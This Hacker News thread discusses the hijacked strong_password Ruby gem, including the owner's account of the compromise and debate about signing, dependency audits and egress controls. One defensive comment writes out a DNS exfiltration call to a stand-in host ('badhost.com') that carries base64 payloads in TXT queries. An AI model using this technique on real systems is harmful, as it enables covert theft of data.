
Strong_password Rubygem hijacked - jrochkind1
https://withatwist.dev/strong-password-rubygem-hijacked.html
======
bdmac97
Hi all. I'm the (actual) owner of that gem.

As already hypothesized in the comments I'm pretty sure this was a simple
account hijack. The kickball user likely cracked an old password of mine from
before I was using 1password that was leaked from who knows which of the
various breaches that have occurred over the years.

I released that gem years ago and barely remembered even having a rubygems
account since I'm not doing much OSS work these days. I simply forgot to
rotate out that old password there as a result which is definitely my bad.

Since being notified and regaining ownership of the gem I've:

1\. Removed the kickball gem owner. I don't know why rubygems did not do this
automatically but they did not.

2\. Reset to a new strong password specific to rubygems.org (haha) with
1password and secured my account with MFA.

3\. Released a new version 0.0.8 of the gem so that anyone that unfortunately
installed the bogus/yanked 0.0.7 version will hopefully update to the new/real
version of the gem.

~~~
confiq
one more reason why to use a password manager and have a unique password.

Thanks for sharing the info!

------
nneonneo
This is a gem that checks the strength of a user-submitted password. It has a
large number of downloads (37,000 on the legitimate 0.0.6 version). It looks
like it's made to be integrated on webservers.

The modified gem downloaded and executed code stored in a editable Pastebin,
meaning that the code could have changed at any time. Presumably, the
malicious code would activate just by browsing any page on the affected site.
One version of the Pastebin code would execute any code embedded in a magic
cookie sent by a client. Plus, it would ping the attacker's server to let them
know your webserver was infected.

Nasty, nasty stuff.

~~~
pharrington
> This is a gem that checks the strength of a user-submitted password

Does it, though?

[https://github.com/bdmac/strong_password/blob/master/lib/str...](https://github.com/bdmac/strong_password/blob/master/lib/strong_password/entropy_calculator.rb)

~~~
fasterdom
Indeed, replacing this with the list of top 100 passwords would be much more
effective.

~~~
cyphar
Or, alternatively, switching to the haveibeenpwned API[1] or zxcvbn[2].

[1]: [https://haveibeenpwned.com/API/v2](https://haveibeenpwned.com/API/v2)
[2]: [https://github.com/dropbox/zxcvbn](https://github.com/dropbox/zxcvbn)

------
MrStonedOne
The unanswered question is still how this `kickball` account gained control of
the gem.

> The gem seems to have been pulled out from under me… When I login to
> rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was
> created 6/25/2019.

The way I see it, there are a few options:

1\. The rubygem was transferred by ruby staff to this account.

2\. The maintainer's account was hijacked and then it was transferred, and
could even still be compromised.

3\. There is some issue or attack vector with the rubygem system that allowed
the attacker to gain control.

Any guesses?

~~~
zbentley
Option 2 is overwhelmingly likely, IMO. Phishing, password reuse, credential
scraping/spamming, and plain old brute force are unbelievably common.

That said, the other two options bear investigation too. Just don't spend time
looking for a cold breeze from an un-caulked window frame when the screen door
is open.

~~~
saurik
The true irony, of course, is that the package in question is designed
(whether it does or not isn't the point, though I guess if it isn't very good
then this becomes all the more humorous) to help prevent people from reusing
common passwords or choosing passwords that are easy to brute force ;P...
clearly the author should have used this package to select their password that
protected the uploads of this package.

~~~
viraptor
We don't know that. Their system could've been compromised in some other way
and the password captured.

------
fasterdom
We need a sort of capability and permission method for libraries.

For example a "strong_password" library should only by given "CPU compute"
permissions, no I/O.

But even with this, the problem will be like we see on phone, popular
libraries will require all the permissions.

You'll want to install React, and React + it's 100 dependencies will request
everything.

~~~
kibwen
To be honest, even the coarsest-possible permissions of "can do I/O" vs.
"can't do I/O" would be exceedingly effective at stymieing these sorts of
attacks; all malicious software of this sort needs to do I/O at some point,
and relatively few libraries actually have a good excuse to do I/O (though
logging might be thorny).

That said it seems easier said than done to impose those sorts of restrictions
on a per-dependency basis. Attempts to statically verify the absence of I/O
sounds like a great game of whack-a-mole, and I don't know how you'd do it
dynamically without running all non-I/O dependencies in an entirely separate
process from the main program.

~~~
redsymbol
> few libraries actually have a good excuse to do I/O (though logging might be
> thorny).

Yeah, logging would be tricky...

Maybe a "logging" capability could be created. Separated from other I/O.

Such a capability would be weird, and nonstandard, and messy, cutting across
several several abstraction layers. But if pulled off, it might be worth the
effort.

~~~
viraptor
That's solved in similar frameworks by separating open and read/write. You
open (or inherit from somewhere) a logging socket, drop the open privileges,
retain the permission to write to the log socket.

~~~
masklinn
This discussion is basically inventing a per-library pledge(2).

~~~
viraptor
or apparmor, selinux, grsec, tomoyo, ... But those systems can't integrate
into scripting language per-library use case without some serious thread / IPC
overhead.

~~~
masklinn
These others can achieve what's intended, but the entire flavour of the
discussion is a dead ringer for pledge's purpose and interface, which is much
simpler and very much internal to the software (a self-check of sorts).

------
westoque
In light of vulnerabilities like these, I’m glad there are developers that
spend time to make their apps more secure. Thus, making us all aware that
issues like these are out there. Security is almost always just put off in
exchange for features and security is most of the time taken for granted. It’s
about time that we start taking it seriously.

Kudos to you!

------
frizkie
It seems to me like the only way to really provide any sense of security is to
force gems uploaded to RubyGems to be signed. There is some discussion here
([https://github.com/rubygems/guides/pull/70](https://github.com/rubygems/guides/pull/70))
about why the Rubygems PGP CA isn't really worth using in its current state.
As we've seen with Javascript dependencies, we can only put off dealing with
this problem for so long.

~~~
javagram
Another solution would be changing the ecosystem to no longer be reliant on so
many third party dependencies.

For instance if I am using Java and I build my web app with only Spring
Framework, I can have a lot more confidence that one of my JARs hasn’t been
backdoored than I can in an ecosystem where it’s regularly the practice to
pull 100s of dependencies from different individual FOSS developers, where
it’s difficult to audit the process that each library author is using to
secure their package manager upload credentials.

I am not sure signatures are that useful since without a centralized authority
to issue the certificates and securely verify author identities, we are just
back to a trust-on-first-use policy for the signatures, and people will just
end up setting their CI servers to always trust new signatures since they
won’t want to deal with what happens when authors change their certificate
from version to version (which will surely happen).

~~~
msbarnett
Sure, obviously reinventing as many wheels as possible will minimize your
exposure to third-party malfeasance.

As in all forms of engineering there are, of course, no absolutes, only trade-
offs to be made.

The more wheels you reinvent, the slower your velocity for solving the core
business problems that pay your bills. Moving too slowly can be fatal to the
business. It’s a tricky balance. Signing isn’t perfect, but it can improve
some aspects of some balances people strike.

~~~
PeterisP
It's not about the amount of functionality shifted to dependencies, but about
the fragmentation of these dependencies.

Packaging and distribution of libraries takes effort to do it properly, so
they're only done properly if it's sufficiently centralized. If you have to
import fifty third-party wheels, then it's unavoidable that some or most of
these wheels can't be managed properly, but it's quite feasible to have a
single (or three) well-managed third-party package that provides a hundred
wheels so that you don't have to reinvent them. If the strong_password gem was
integrated in (for example) Rails and managed/released by the same team with
the same processes, then this risk would be avoided. If instead of a dozen
separate gems with every functionality separate you'd have a single bundle of
varied functionality like in Java there's Guava or Appache Commons, then that
bundle can handle release management in a way that each separate gem developer
can not.

If you want to have reliable dependencies then you eithery have to choose
_only_ dependencies with buraucratic and pedantic release governance, or
manage/audit each dependency yourself (as the author of the original article
seems to have done). In ecosystems where it's reasonable to have serious
projects that have 0-3 distinct (but large) external dependencies this works
easily; in ecosystems where you have dozens or even a hundred dependencies,
that overhead is impractical for most projects.

~~~
zbentley
> If you want to have reliable dependencies then you eithery have to choose
> only dependencies with buraucratic and pedantic release governance, or
> manage/audit each dependency yourself

That's a false dichotomy. There are middle grounds which can and do work at
scale:

Upgrade knowingly and deliberately (don't just spray greenkeeper everywhere).

Carefully monitor changed application/network behavior after upgrades.

Devote a manageable, non-zero amount of time to reading/finding security
bulletins or security incidents on your most-heavily-used dependencies.

Pay attention to issue reports and prioritize any with possible security
implications.

...and (at a slightly larger scale) hire, empower, and compensate people to do
those kinds of things in a systematic, regular way.

Seriously, security engineering isn't served well by "ZOMG NPM is garbage we
must switch to $megaframework and pray that their release engineers get
everything right" hysteria and absolutism. There are effective, moderate
strategies that help with these issues every day.

~~~
javagram
I think we can simplify that middle ground proposal down to two items:

1) only upgrade dependencies “knowingly and deliberately” (as the author of
this article did). What does this mean if not auditing the upgrades? Just
upgrading more rarely (e.g. because you know you need a specific feature or
bug fix), but still auditing them? By waiting to upgrade, the diff will be
vastly larger and performing an audit to “knowingly” upgrade will be much more
difficult.

2) detecting a breach after you’ve already installed an attacker’s code onto
your servers, via active monitoring or by hoping someone else does active
monitoring or auditing and reports the issue to you or to a central authority.

#1 as a “middle ground” doesn’t seem too different from the post you responded
to. #2 is what most projects seem to rely on - hope someone else finds the
problem and reports it, and that they don’t get hit too hard in the meantime.

------
oomkiller
There's still a lot to learn about this incident, but most likely the RubyGems
account was compromised, allowing the attacker to upload whatever they wanted.
Signed releases with a web of trust would be ideal, but I doubt we'll ever see
that world. A simple and pragmatic solution would be to have the next version
of bundler support the ability to only install packages published with 2
factor enabled, then the next major rails version default it to on, with
plenty of advanced warning in 6.x/bundler. This still has plenty of gaps, such
as an attacker being able to take over even with 2 factor, and then re-
enabling it with their own keys, or RubyGems.org itself being compromised. It
still represents a major upgrade in security for the entire Ruby ecosystem
without causing much pain to authors and users.

------
hiccuphippo
Reminds me of this article: [https://hackernoon.com/im-harvesting-credit-card-
numbers-and...](https://hackernoon.com/im-harvesting-credit-card-numbers-and-
passwords-from-your-site-here-s-how-9a8cb347c5b5)

------
jlmorton
This is a great reason why you should never allow unknown outgoing connections
from Production.

You can implement this however makes sense for you. For me, the easiest thing
is to run a simple locked down proxy server, and allow only specific domains
there. This makes it easy to setup whatever rules you want, allowing entire
domains, or only specific hosts. And it gives you a convenient place to log
entries before you lock them down.

This is also why you shouldn't allow external DNS resolution from every host
in your network. It would be just as easy to move data in and out with
Dnsruby::Resolver.query('base64-encoded-payload.badhost.com', 'TXT'), 255
bytes at a time.

Once everything is moving through your proxy, there's no need to allow
external DNS resolution from other hosts.

~~~
zelon88
If an attacker has the ability to send dig queries to a remote host, he can
over-ride anything you put in place on the host to prevent external DNS
queries.

Also, most of this traffic is still unencrypted and dig'ging strange severs is
noisy as hell. I'm pretty sure (famous last words) that most entry-level
firewalls would flag this out of the box. If they don't, they should.

Still upvoted you though. This is an exfiltration technique that is really
easy to spot and not widely known about.

~~~
jlmorton
Right, worry about outgoing traffic first, and DNS resolution second. And this
goes for all traffic. Even ICMP can used to tunnel data.

------
hirundo
> I went line by line linking to each library’s changeset. This due diligence
> never reported significant surprises to me, until this time.

Mad props to the author, Tute Costa, for doing this. It's a large investment
of time for usually no return, so I think very few people do. And his (?)
reaction to finding this was quite effective.

Thank you for your service sir.

------
ioquatix
If you have time and/or money and want to contribute to fixing this issue,
please feel free to join in:
[https://github.com/rubygems/rubygems/issues/2496](https://github.com/rubygems/rubygems/issues/2496)

------
sudhirj
The way I see it, the root of the problem is that there isn't an independently
verifiable association between a package and code commit hash that it's been
generated from. My GitHub page can have good code, but no one has any idea
what's in the corresponding package.

Does the upcoming builtin package manager on GitHub solve this problem? Does
it guarantee that packages are only built from code pushed to GitHub and that
associate the commit hash in the metadata in some way?

------
huxflux
Rubygem should contract an external auditor (security firm), this could go way
deeper. Until they perform a throughout audit I will personally stay away from
this project.

~~~
FDSGSG
So why does this not apply to everything?

If "this could go way deeper" is your answer to a super unpopular rubygem
getting hijacked, why isn't that just the default assumption then?

Do you only use thoroughly audited software projects? How do you manage that?

------
1337shadow
We really need more signing support in language specific packaging.

------
Papirola
why not just restrict the production environment to not open ports other than
80 and not to create TCP channels to unauthorized hosts?

~~~
acdha
It’s effective but tends to be a considerable amount of work to maintain,
especially since the web is more dynamic these days: imagine what it would
take to filter only authorized connections to a service hosted on AWS, for
example, where anyone in the world can get IPs in the possible range and even
put data on white-listed hostnames like S3. You’re basically building an allow
list of host names, intermediating every update path, etc. and dealing with
things which were designed with a more open model — e.g. do you disable things
like OCSP or whitelist more third-party resources?

This also heavily encourages microservices since most non-trivial applications
will have some reason to connect to fairly arbitrary resources. Hopefully that
can be sandboxed well but relatively few apps were designed that way and that
general class of missing things which weren’t supposed to work is notoriously
easy for even experienced teams to miss.

